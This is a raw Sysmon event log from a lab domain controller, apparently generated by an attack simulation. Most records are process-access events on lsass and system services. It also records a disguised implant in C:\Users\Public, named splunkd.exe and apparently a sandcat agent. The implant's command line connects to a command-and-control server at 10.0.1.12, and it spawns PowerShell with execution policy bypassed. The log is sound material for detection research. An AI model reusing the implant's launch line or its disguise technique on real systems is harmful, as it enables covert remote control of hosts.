13:09:44.518{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.518{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.517{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.517{08A6967A-428F-6000-2600-000000009A01}23081468C:\Users\Public\splunkd.exe{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.513{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C czqsraC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-428F-6000-2600-000000009A01}2308C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.479{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.461{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.461{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.448{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe10.0.14393.4104 (rs1_release.201202-1742)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=6043CA1520B1BBAF3D9AE9A1221D170A,SHA256=3A460FD2DDBE63B799879A348799F4D0A4FB4E948386F675B44A769C820CBF9F,IMPHASH=5788588905781015CF350C5A9ABBA1F2{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.443{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.442{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.442{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.442{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.426{08A6967A-428D-6000-2300-000000009A01}2980C:\Users\Public\sandcat.exe 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:43.322{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3000-000000009A01}2376C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:43.322{08A6967A-4288-6000-1000-000000009A01}11362956C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3000-000000009A01}2376C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6e4c8|C:\Windows\System32\wer.dll+3776c|C:\Windows\System32\wer.dll+38a78|C:\Windows\System32\wer.dll+13ae4|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e38|c:\windows\system32\wuaueng.dll+554a8|c:\windows\system32\wuaueng.dll+4e24b|c:\windows\system32\wuaueng.dll+4e49b|c:\windows\system32\wuaueng.dll+4e5fe|c:\windows\system32\wuaueng.dll+4fb28|c:\windows\system32\wuaueng.dll+5c36f|c:\windows\system32\wuaueng.dll+4d1d5|c:\windows\system32\wuaueng.dll+4c805|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:39.525{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:39.525{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:38.009{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:37.994{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4291-6000-2800-000000009A01}2012C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 